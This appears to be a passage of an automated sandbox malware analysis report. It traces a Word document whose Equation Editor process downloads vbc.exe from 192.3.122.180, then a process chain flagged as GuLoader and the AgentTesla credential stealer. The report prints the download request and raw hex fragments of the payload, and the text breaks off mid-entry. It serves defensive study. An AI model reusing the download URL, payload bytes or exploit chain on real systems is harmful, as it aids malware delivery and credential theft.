                                                                          Dec 1, 2021 20:57:58.504260063 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.504283905 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.504287958 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.504311085 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.504314899 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.504338026 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.504348040 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.504364967 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.504390001 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.504390001 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.504417896 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.504417896 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.504446030 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.504448891 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.504472017 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.504492998 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.504492998 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.504532099 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.504559040 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.505203009 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.507167101 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614382982 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614419937 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614445925 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614458084 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614471912 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614495993 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614500046 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614511967 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614518881 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614530087 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614541054 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614566088 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614567995 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614588976 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614588976 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614598989 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614613056 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614634991 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614638090 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614655972 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614659071 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614666939 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614682913 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614686012 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614706993 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614728928 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614728928 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614738941 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614756107 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614768028 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614780903 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614803076 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614803076 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614825010 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614826918 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614841938 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614851952 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614872932 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614872932 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614887953 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614897966 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614907026 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614921093 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614939928 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614948988 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614953995 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614973068 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.614990950 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.614995003 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.615012884 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.615035057 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.616520882 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.616924047 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.616950035 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.616972923 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.616983891 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.616996050 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.616997957 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.617018938 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.617022991 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.617042065 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.617049932 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.617060900 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.617074013 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.617091894 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.617099047 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.617106915 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.617120028 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.617137909 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.617141962 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.617160082 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.617176056 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.619049072 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.619079113 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.619085073 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.619105101 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.619124889 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.619163990 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.619832039 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.621081114 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.621131897 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.621141911 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.621159077 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.621182919 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.621198893 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.621738911 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:59.543869972 CET4916580192.168.2.22192.3.122.180

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 1, 2021 20:59:55.853311062 CET5216753192.168.2.228.8.8.8
                                                                          Dec 1, 2021 20:59:57.084176064 CET5059153192.168.2.228.8.8.8
                                                                          Dec 1, 2021 21:00:02.072386026 CET5780553192.168.2.228.8.8.8

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                          Dec 1, 2021 20:59:55.853311062 CET192.168.2.228.8.8.80x6471Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                                          Dec 1, 2021 20:59:57.084176064 CET192.168.2.228.8.8.80x6897Standard query (0)eruitg.bl.files.1drv.comA (IP address)IN (0x0001)
                                                                          Dec 1, 2021 21:00:02.072386026 CET192.168.2.228.8.8.80x9122Standard query (0)fspzka.bl.files.1drv.comA (IP address)IN (0x0001)

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                          Dec 1, 2021 20:59:55.888254881 CET8.8.8.8192.168.2.220x6471No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                          Dec 1, 2021 20:59:57.183187008 CET8.8.8.8192.168.2.220x6897No error (0)eruitg.bl.files.1drv.combl-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                                          Dec 1, 2021 20:59:57.183187008 CET8.8.8.8192.168.2.220x6897No error (0)bl-files.fe.1drv.comodc-bl-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                          Dec 1, 2021 21:00:02.143680096 CET8.8.8.8192.168.2.220x9122No error (0)fspzka.bl.files.1drv.combl-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                                          Dec 1, 2021 21:00:02.143680096 CET8.8.8.8192.168.2.220x9122No error (0)bl-files.fe.1drv.comodc-bl-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • 192.3.122.180

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.2249165192.3.122.18080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          TimestampkBytes transferredDirectionData
                                                                          Dec 1, 2021 20:57:58.035166025 CET0OUTGET /1100/vbc.exe HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                          Host: 192.3.122.180
                                                                          Connection: Keep-Alive
                                                                          Dec 1, 2021 20:57:58.153230906 CET1INHTTP/1.1 200 OK
                                                                          Date: Wed, 01 Dec 2021 19:57:58 GMT
                                                                          Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31
                                                                          Last-Modified: Wed, 01 Dec 2021 09:20:35 GMT
                                                                          ETag: "2020b-5d2122fb5045c"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 131595
                                                                          Keep-Alive: timeout=5, max=100
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-msdownload
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 04 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 e0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 11 00 00 00 c0 04 00 00 12 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPELZOaj-5@@.texthj `.rdatan@@.data@.ndata``.rsrc@@
                                                                          Dec 1, 2021 20:57:58.153278112 CET3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 08 4f 43 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00 53 56 8b 35 10 4f 43 00 8d 45 a4
                                                                          Data Ascii: U\}t+}FEuHOCHPuuu@BSV5OCEWPu@eEEPu@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu
                                                                          Dec 1, 2021 20:57:58.153299093 CET4INData Raw: 43 00 e9 f9 16 00 00 8b 88 e0 4f 43 00 89 88 80 4f 43 00 e9 e8 16 00 00 8b 45 d8 8d 34 85 80 4f 43 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d dc 8b 44 85 d0 89 0e e9 d2 16 00 00 8b 45 d4 ff 34 85 80 4f 43 00 57 e9 31 16 00 00 8b 0d d0 3e 43 00 8b 35 50
                                                                          Data Ascii: COCOCE4OC3;#MDE4OCW1>C5P@;tuQE>C;PQjuP@nmjPEH;tZj\VZHf>ff;u9]tEtulDuD;t=uu
                                                                          Dec 1, 2021 20:57:58.153323889 CET5INData Raw: 89 1f 66 89 9f fe 07 00 00 e9 b8 11 00 00 8b 75 e4 53 e8 09 13 00 00 6a 01 8b f8 89 55 f0 e8 fd 12 00 00 59 3b f3 59 89 55 f0 75 08 3b f8 7c 08 7e 8a eb 12 3b f8 73 08 8b 45 dc e9 91 11 00 00 0f 86 76 ff ff ff 8b 45 e0 e9 83 11 00 00 6a 01 e8 cb
                                                                          Data Ascii: fuSjUY;YUu;|~;sEvEjjUuYUYE$L-@_+X;tSC#323;;u3;t;t3F;t3E
                                                                          Dec 1, 2021 20:57:58.267669916 CET7INData Raw: 00 ff 75 ac eb 47 53 e8 fc 0d 00 00 8b f0 56 6a eb e8 eb 35 00 00 56 e8 66 3b 00 00 8b f0 3b f3 0f 84 6a 09 00 00 39 5d d8 74 21 56 e8 e6 49 00 00 39 5d d4 7c 0b 50 ff 75 f4 e8 a7 44 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 24 81 40
                                                                          Data Ascii: uGSVj5Vf;;j9]t!VI9]|PuD;tEV$@4jPpH;tvupDvQEffjuMEQPjHEf;fEVj@8@;EjHjEHuEVSuU
                                                                          Dec 1, 2021 20:57:58.267709970 CET8INData Raw: 00 00 8d 44 00 02 83 fe 04 75 12 6a 03 e8 9a 08 00 00 59 a3 f0 b5 40 00 56 89 55 c8 58 83 fe 03 75 0f 68 00 18 00 00 57 53 ff 75 dc e8 ab 0d 00 00 50 57 ff 75 f0 53 ff 75 bc ff 75 08 ff 15 0c 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 d3 00 00 00
                                                                          Data Ascii: DujY@VUXuhWSuPWuSuu@u]uhj3i;fMEQMWQSPV@3Au.}t9Mt}uEEt739]WE>ffM^h>j;YUfn9]M
                                                                          Dec 1, 2021 20:57:58.267733097 CET10INData Raw: 08 e8 c7 36 00 00 57 ff 15 34 81 40 00 83 4d c8 ff 53 53 ff 75 08 ff 75 c8 e8 84 08 00 00 ff 75 08 8b f8 ff 15 24 81 40 00 6a f3 3b fb 5e 7d 13 6a ef 5e ff 75 c0 ff 15 70 81 40 00 c7 45 fc 01 00 00 00 56 e9 96 f8 ff ff 53 e8 23 03 00 00 8b f8 59
                                                                          Data Ascii: 6W4@MSSuuu$@j;^}j^up@EVS#Y;=,OCUEi5(OC;|uVu:Q+MtjYUEuFP:NEM9]JW?S YU09]t"9]
                                                                          Dec 1, 2021 20:57:58.267750978 CET11INData Raw: c0 74 d0 ff 75 fc ff 15 10 80 40 00 6a 03 e8 ab 39 00 00 85 c0 75 1e ff 75 0c ff 75 08 ff 15 18 80 40 00 eb 1b ff 75 fc ff 15 10 80 40 00 b8 eb 03 00 00 eb 0b 6a 00 56 ff 75 0c ff 75 08 ff d0 5f 5e 5b c9 c2 0c 00 55 8b ec 81 ec 80 00 00 00 81 7d
                                                                          Data Ascii: tu@j9uuu@u@jVuu_^[U}ujhju@@E}uLA$B;rPjdQ@PEh@PT@EPuD@EPhuh+3V39t$t B;tP8@5 B^95 B
                                                                          Dec 1, 2021 20:57:58.267772913 CET12INData Raw: 45 00 00 00 85 c0 74 2f 56 57 ff 75 0c e8 47 2c 00 00 85 c0 74 c8 01 75 fc 29 75 14 83 7d 14 00 7f cc eb 1b 39 75 14 7d 03 8b 75 14 56 57 e8 16 00 00 00 85 c0 75 05 6a fd 58 eb 06 89 75 fc 8b 45 fc 5f 5e 5b c9 c2 10 00 ff 74 24 08 ff 74 24 08 ff
                                                                          Data Ascii: Et/VWuG,tu)u}9u}uVWujXuE_^[t$t$5@+jjt$5@`@V(DV2Vu)u^V(V%Vh D1+^USVWj _3h]E@]@5@P]]
                                                                          Dec 1, 2021 20:57:58.267791986 CET14INData Raw: e8 78 2b 00 00 0f b7 05 5a a2 40 00 0f b7 0d 58 a2 40 00 c1 e0 10 0b c1 c7 45 f8 1a 00 00 00 a3 00 68 43 00 bf 28 aa 42 00 a1 10 4f 43 00 ff b0 20 01 00 00 57 e8 80 2b 00 00 57 ff 15 70 81 40 00 39 5d fc 74 3e 6a 01 57 68 00 38 44 00 ff 15 e4 80
                                                                          Data Ascii: x+Z@X@EhC(BOC W+Wp@9]t>jWh8D@t,SW(OC$WJ+W ;tP$@]fhCMuSV(3@9]th u'!j@9OCtvEPj(@P$@t/EPh0@S @SSES
                                                                          Dec 1, 2021 20:57:58.273269892 CET15INData Raw: 8b 29 66 33 e8 23 eb 66 85 ed 74 06 85 f6 75 ec eb 19 8b 51 02 89 15 e0 3e 43 00 8b 51 06 89 15 a8 4f 43 00 8d 51 0a 85 d2 75 12 66 81 fb ff ff 75 07 bb ff 03 00 00 eb a3 33 db eb 9f 89 15 dc 3e 43 00 0f b7 01 50 57 e8 3d 25 00 00 e8 2f 00 00 00
                                                                          Data Ascii: )f3#ftuQ>CQOCQufu3>CPW=%/,OC5(OCttPFP&Ou_^][V?CjV%V5HBD@^SUVt$$;WaU|$$3GujUUUUW5HB@\$,uBH


                                                                          Code Manipulations

                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          Analysis Process: WINWORD.EXE PID: 1724 Parent PID: 596

                                                                          General

                                                                          Start time:20:57:16
                                                                          Start date:01/12/2021
                                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                          Imagebase:0x13f860000
                                                                          File size:1423704 bytes
                                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: EQNEDT32.EXE PID: 1124 Parent PID: 596

                                                                          General

                                                                          Start time:20:57:18
                                                                          Start date:01/12/2021
                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                          Imagebase:0x400000
                                                                          File size:543304 bytes
                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: vbc.exe PID: 2836 Parent PID: 1124

                                                                          General

                                                                          Start time:20:57:20
                                                                          Start date:01/12/2021
                                                                          Path:C:\Users\Public\vbc.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\Public\vbc.exe"
                                                                          Imagebase:0x400000
                                                                          File size:131595 bytes
                                                                          MD5 hash:99BDB5995C8DD619A3EC2B799D1CF868
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 20%, ReversingLabs
                                                                          Reputation:low

                                                                          Chronological Activities

                                                                          Analysis Process: Acly3.exe PID: 2804 Parent PID: 2836

                                                                          General

                                                                          Start time:20:57:23
                                                                          Start date:01/12/2021
                                                                          Path:C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                          Imagebase:0x400000
                                                                          File size:21304624 bytes
                                                                          MD5 hash:E32061DA9B34B82E0AB5D0E53CAF5A09
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Visual Basic
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.679995330.00000000003E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          Reputation:low

                                                                          Chronological Activities

                                                                          Analysis Process: CasPol.exe PID: 2524 Parent PID: 2804

                                                                          General

                                                                          Start time:20:58:28
                                                                          Start date:01/12/2021
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                          Imagebase:0xda0000
                                                                          File size:107680 bytes
                                                                          MD5 hash:10FE5178DFC39E15AFE7FED83C7A3B44
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low

                                                                          Chronological Activities

                                                                          Analysis Process: CasPol.exe PID: 2052 Parent PID: 2804

                                                                          General

                                                                          Start time:20:58:29
                                                                          Start date:01/12/2021
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                          Imagebase:0xda0000
                                                                          File size:107680 bytes
                                                                          MD5 hash:10FE5178DFC39E15AFE7FED83C7A3B44
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low

                                                                          Chronological Activities

                                                                          Analysis Process: CasPol.exe PID: 672 Parent PID: 2804

                                                                          General

                                                                          Start time:20:58:29
                                                                          Start date:01/12/2021
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                          Imagebase:0xda0000
                                                                          File size:107680 bytes
                                                                          MD5 hash:10FE5178DFC39E15AFE7FED83C7A3B44
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000000.560395041.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                          Reputation:low

                                                                          Chronological Activities

                                                                          Analysis Process: misv.exe PID: 2812 Parent PID: 672

                                                                          General

                                                                          Start time:20:59:21
                                                                          Start date:01/12/2021
                                                                          Path:C:\Users\user\AppData\Roaming\misv.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\misv.exe"
                                                                          Imagebase:0x400000
                                                                          File size:135018 bytes
